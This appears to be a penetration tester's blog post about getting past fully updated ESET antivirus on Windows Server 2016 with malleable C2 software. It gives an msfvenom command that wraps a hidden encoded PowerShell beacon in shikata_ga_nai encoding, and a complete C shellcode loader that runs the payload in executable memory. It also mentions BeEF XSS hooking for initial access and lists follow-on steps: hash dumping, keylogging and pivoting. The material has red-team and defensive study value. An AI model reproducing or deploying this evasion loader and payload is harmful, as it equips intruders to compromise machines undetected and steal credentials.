Bypassing Antivirus with malleable C2 software, MSFVenom and Visual Studio

Many times, during an engagement, you may get a great foothold on a lower tier machine or need a way into the environment, only to be stifled by the lack of ability to execute payloads (i.e. Antivirus is blocking payload execution).  Recently, I have been playing around with some items, namely two malleable C2 software.   Both of these projects work very well.  In the following examples, I am going to show, unfortunately, just how well these work in a “live fire” demonstration with a fully updated Antivirus software installed and running.

 

To begin, you would need to get an initial foothold into the site.  This can be accomplished either via XSS on a site relating to the client, targeted phishing with payloads or other.  If using XSS, Beef XSS Framework is a nifty tool that still works quite well to hook the browsers.  Once hooked, you can neatly inject your payloads for the malleable C2 server software.  I chose to go a bit more targeted, instead testing against a Window Server 2016 Standard Evaluation  with ESET File Security 6.5.12014.1 installed and fully updated:

 

 

With the software fully updated, I then sought out to bypass it.

 

I first loaded my current test C2 software on Kali and created a powershell agent string.  The beneficial part of using Beef or other browser injection frameworks is that you can inject directly into Operating Memory, bypassing leaving artifacts on the disk to be detected or found later. For the sake of this example, I used MSFVenom to create a payload in C that would execute my command:

 

EX: msfvenom -p windows/exec cmd=”powershell -nop -w hidden -e REALLY LONG STRING -f c -e x86/shikata_ga_nai -i 5 > shell_code_beacon.c

 

Next, I took this and uploaded the resulting shellcode to skeleton C project for building with Visual Studio.  The skeleton code for the project can be located here:

Skeleton EXE Code:

#include <stdafx.h>
#include <stdio.h>
#include <windows.h> //VirtualAlloc is defined here
unsigned const char payload[] = “”; //msfvenom shellcode
size_t size = 0; //payload size from msfvenom
int main(int argc, char **argv) {
char *code; //Holds a memory address
code = (char *)VirtualAlloc( //Allocate a chunk of memory and store the starting address
NULL, size, MEM_COMMIT,
PAGE_EXECUTE_READWRITE //Set the memory to be writable and executable
);
memcpy(code, payload, size); //Copy our payload into the executable section of memory
((void(*)())code)(); //Cast the executable memory to a function pointer and run it
return(0);
}

 

With the code above, you will need to copy and paste your resulting shellcode from the MSFVenom payload creation and byte size of the payload that it created.  Once completed, you will just click Build in Visual Studio to build out an executable of the command line beacon application.

 

 

With our payload built out, it is now time to test and see the efficacy of this.  ESET has a great application with very high detection rates, especially for heuristic analysis of unknown threats.  So, let us see how we did with a right click > context menu scan…

 

 

A context menu scan shows that the executable is clean. A scan of an encoded Meterpreter would show as Win32/Rozena or Win64/Rozena, depending on how you built the payload. Once the beacon is executed, we see a connection show up in our console.

 

 

 

The traffic uses TLSv1 and appears to go to Amazon, which will get around some IDS systems and administrators not looking too keenly at logs.

 

 

From this point we can dump password hashes for use in replay attacks if credentials are re-used across multiple machines, add other software, log keystrokes, add other software packages and use this machine to pivot across the entire network.

 

Stay safe out there.

Dataclast Written by: